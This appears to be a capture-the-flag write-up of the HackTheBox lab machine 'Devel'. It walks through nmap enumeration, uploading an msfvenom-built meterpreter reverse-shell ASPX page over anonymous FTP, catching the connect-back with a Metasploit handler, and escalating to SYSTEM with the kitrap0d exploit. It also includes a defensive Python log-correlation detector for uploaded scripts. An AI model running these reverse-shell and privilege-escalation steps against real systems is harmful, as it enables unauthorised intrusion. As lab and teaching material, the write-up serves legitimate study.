About

Name: Devel
IP Address: 10.10.10.5
Operating System: Windows
Difficulty: 3.7/10
Base Points: 20

Enumeration

As always we start with an Nmap scan to discover open ports and the services running on the server:

nmap -sC -sV 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-09 17:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       DIR          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap scan shows two open ports: 21 (Microsoft FTP) and 80 (IIS 7.5).
The ftp-anon script also tells us the FTP server accepts anonymous logins, and the listing it returned (aspnet_client, iisstart.htm, welcome.png) looks like the default IIS web root.

Initial Foothold

Browsing to the website reveals nothing special, just the standard IIS 7 welcome page.

Let's check the FTP server as well.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       DIR          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

Okay, we have read access. But what about write access? If we can write files to the FTP server, we can probably upload code and get a reverse shell.

Testing confirms that anonymous FTP has write permission and that the FTP root is the IIS web root: a file uploaded over FTP can be fetched straight away over HTTP. That combination (anonymous write into a directory IIS serves and executes) is the real misconfiguration on this box.

Let's create and upload an .aspx shell and see if we can get the server to connect back to us.

Create ASPX Shell And Upload

As usual we use msfvenom to create the payload. We choose windows/meterpreter/reverse_tcp, set LPORT to 4444 and LHOST to our VPN address, select aspx as the output format and write the result to shell.aspx:

msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.8 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2814 bytes

Now we need to upload the shell to the server.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2850 bytes sent in 0.00 secs (33.5552 MB/s)

Awesome! The shell uploads successfully.
Now we need to set up Metasploit to handle the connect-back and deliver the second stage of the meterpreter session.

Metasploit

root@kali:~# msfdb run
[i] Database already started
       =[ metasploit v4.17.21-dev                         ]
+ -- --=[ 1822 exploits - 1033 auxiliary - 316 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT                      yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.8
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:4444

I use exploit/multi/handler with the windows/meterpreter/reverse_tcp payload.
I set LPORT to the port we defined in our .aspx payload, and LHOST to tun0, which is my VPN tunnel interface to HackTheBox; Metasploit resolves the interface name to 10.10.14.8.
You can also specify your HTB IP address instead of tun0.

Finally we run the handler, and it is now listening for the connect-back.

If we now request http://10.10.10.5/shell.aspx, IIS compiles and executes the page, which runs our payload and connects back to the handler:

[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 17:48:47 +0100

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\Web

Awesome! The server connected back to us and we have a meterpreter shell.

But we are only running as the application pool identity, IIS APPPOOL\Web, so we need to escalate our privileges.
sysinfo reports Windows 7 Build 7600, which is the original release without Service Pack 1, so there should be a few local vulnerabilities we can exploit.
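The chain above (anonymous FTP write into the web root, then an HTTP request that makes IIS execute the upload) is exactly what a defender wants to spot in the server logs. The following is an added example, not code from this writeup or from Metasploit: it correlates IIS FTP and web logs in W3C format, flags server-side script files stored over FTP, and records whether the web server later served (and therefore ran) them. The log lines, the field layout and the extension list are constructed for the example.

```python
import posixpath
from datetime import datetime

# Extensions IIS hands to the ASP/ASP.NET handlers on request (assumed list).
EXEC_EXT = {".aspx", ".asp", ".ashx", ".asmx"}

def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the '#Fields:' names."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            records.append(dict(zip(fields, line.split())))
    return records

def _ts(rec):
    return datetime.fromisoformat(rec["date"] + "T" + rec["time"])

def _name(uri):
    return posixpath.basename(uri.replace("\\", "/")).lower()

def find_uploaded_scripts(ftp_text, web_text):
    """One finding per script stored over FTP; 'executed' means IIS served it afterwards."""
    web = parse_w3c(web_text)
    findings = []
    for rec in parse_w3c(ftp_text):
        if rec["cs-method"] != "STOR" or not rec["sc-status"].startswith("2"):
            continue  # only completed uploads (2xx, e.g. 226) matter
        name = _name(rec["cs-uri-stem"])
        if posixpath.splitext(name)[1] not in EXEC_EXT:
            continue  # plain content such as images is not executed by IIS
        hits = [w for w in web
                if _name(w["cs-uri-stem"]) == name and _ts(w) >= _ts(rec)]
        findings.append({"file": name, "ftp_user": rec["cs-username"],
                         "anonymous": rec["cs-username"].lower() in ("anonymous", "-"),
                         "ftp_client": rec["c-ip"], "executed": bool(hits),
                         "web_client": hits[0]["c-ip"] if hits else None})
    return findings

# Constructed sample logs (IIS 7.5 W3C style; field order chosen for the example).
FTP_LOG = """#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2019-01-09 16:40:12 10.10.14.8 anonymous 10.10.10.5 21 STOR shell.aspx 226
2019-01-09 16:40:40 10.10.14.8 anonymous 10.10.10.5 21 STOR cmd.asp 226
2019-01-09 16:41:00 10.10.14.8 anonymous 10.10.10.5 21 STOR banner.png 226"""
WEB_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2019-01-09 16:42:10 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.8 200
2019-01-09 16:43:00 10.10.10.5 GET /banner.png - 80 - 10.10.14.8 200"""
```

Calling find_uploaded_scripts(FTP_LOG, WEB_LOG) returns two findings: shell.aspx (uploaded anonymously and then executed) and cmd.asp (uploaded but never requested); banner.png is ignored. The fix on the server side is the same either way: no anonymous write, and no FTP root inside a directory IIS will execute from.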

Privilege Escalation

Metasploit has a handy post module called local_exploit_suggester. Let's run it against our session and see which local exploits it thinks could elevate our privileges.

meterpreter > background
[*] Backgrounding session 1... 
msf > use post/multi/recon/local_exploit_suggester 
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 28 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

We background our meterpreter session, load the post module multi/recon/local_exploit_suggester, point it at session 1 (our meterpreter session) and run it.

We get quite a few suggestions back. Note that the module only checks for the presence of the vulnerable component; "appears to be vulnerable" is not a guarantee that the exploit will work. Let's try MS10-015 (kitrap0d).

msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d 
msf exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Launching notepad to host the exploit...
[+] Process 3624 launched.
[*] Reflectively injecting the exploit DLL into 3624...
[*] Injecting exploit into 3624 ...
[*] Exploit injected. Injecting payload into 3624...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 18:25:47 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Boom! NT AUTHORITY\SYSTEM.
We can now grab both user.txt and root.txt (on this box the files are actually named user.txt.txt and root.txt.txt).

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6...4cb3e8

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0...c72b4b

Further Reading

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015

https://www.exploit-db.com/exploits/11199